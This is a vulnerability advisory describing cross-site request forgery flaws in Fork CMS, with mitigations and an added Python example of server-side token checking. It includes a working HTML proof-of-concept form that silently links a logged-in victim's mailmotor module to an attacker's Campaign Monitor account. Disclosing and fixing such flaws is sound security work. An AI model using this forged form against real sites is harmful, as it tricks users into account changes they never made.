====================================================================================
Fork-CMS CSRF:
Introduction
Author: Rafay Baloch
CSRF or XSRF (Cross-Site Request Forgery) occurs when an attacker forces the
victim's browser to send a forged request, causing the victim to perform a
particular action without their consent. Any form that lacks a CSRF token is
vulnerable to it.
Impact:
An attacker can accomplish multiple things; for example, he could change the
details the victim submits through a form.
PROOF OF CONCEPT:
The two forms referenced below are missing CSRF tokens.
The account-linking form is missing a CSRF token, which means an attacker can
force a logged-in user to link the mailmotor module to a Campaign Monitor account:
http://demo.fork-cms.com/private/en/mailmotor/settings?token=true#tabSettingsAccount
POC:
<html>
  <body>
    <form action="http://demo.fork-cms.com/backend/ajax.php" method="POST">
      <input type="hidden" name="fork[module]" value="mailmotor" />
      <input type="hidden" name="fork[action]" value="link_account" />
      <input type="hidden" name="fork[language]" value="en" />
      <input type="hidden" name="url" value="www.google.com" />
      <input type="hidden" name="username" value="rafaybaloch" />
      <input type="hidden" name="password" value="" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
http://demo.fork-cms.com/private/en/settings/email
http://demo.fork-cms.com/backend/ajax.php
Mitigations:
- Re-authenticate the user when he performs an important action on his
  account, e.g. deleting a user or deleting his own account.
- Add a CSRF token to each and every request and make sure that it is
  validated on the server.
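Added example (not Fork CMS code) of the token mitigation listed above: a server-side handler for the PoC's fork[action]=link_account request that issues a per-session token, embeds it in the form, and rejects any submission whose token is missing or wrong. Written in Python for illustration; the csrf_token field name, the in-memory session store and the handler itself are assumptions.

```python
import hmac
import secrets

# Constructed in-memory session store: session id -> session data (example only).
SESSIONS = {}

def start_session():
    """Create a server-side session and issue it a fresh random CSRF token."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"csrf_token": secrets.token_urlsafe(32), "linked_account": None}
    return sid

def render_link_account_form(sid):
    """Server renders the mailmotor 'link account' form with the token embedded.
    Field names follow the advisory's PoC; 'csrf_token' is an assumed name."""
    token = SESSIONS[sid]["csrf_token"]
    return (
        '<form action="/backend/ajax.php" method="POST">'
        '<input type="hidden" name="fork[module]" value="mailmotor" />'
        '<input type="hidden" name="fork[action]" value="link_account" />'
        f'<input type="hidden" name="csrf_token" value="{token}" />'
        '<input name="username" /><input name="password" type="password" />'
        '</form>'
    )

def handle_link_account(sid, form):
    """Hypothetical hardened handler for fork[action]=link_account.
    Returns (http_status, message). A request whose token is missing or does
    not match the session's token is rejected before any state changes."""
    session = SESSIONS.get(sid)
    if session is None:
        return 401, "no session"
    supplied = form.get("csrf_token", "")
    # compare_digest avoids leaking the token through timing differences
    if not hmac.compare_digest(supplied, session["csrf_token"]):
        return 403, "invalid CSRF token"
    session["linked_account"] = form.get("username", "")
    return 200, "account linked"

if __name__ == "__main__":
    sid = start_session()
    # Fields from the PoC form: a cross-site page cannot read the victim's token, so none is sent.
    forged = {"fork[module]": "mailmotor", "fork[action]": "link_account",
              "username": "rafaybaloch", "password": ""}
    print(handle_link_account(sid, forged))  # (403, 'invalid CSRF token')
    legit = dict(forged, csrf_token=SESSIONS[sid]["csrf_token"])
    print(handle_link_account(sid, legit))   # (200, 'account linked')
```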
//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information.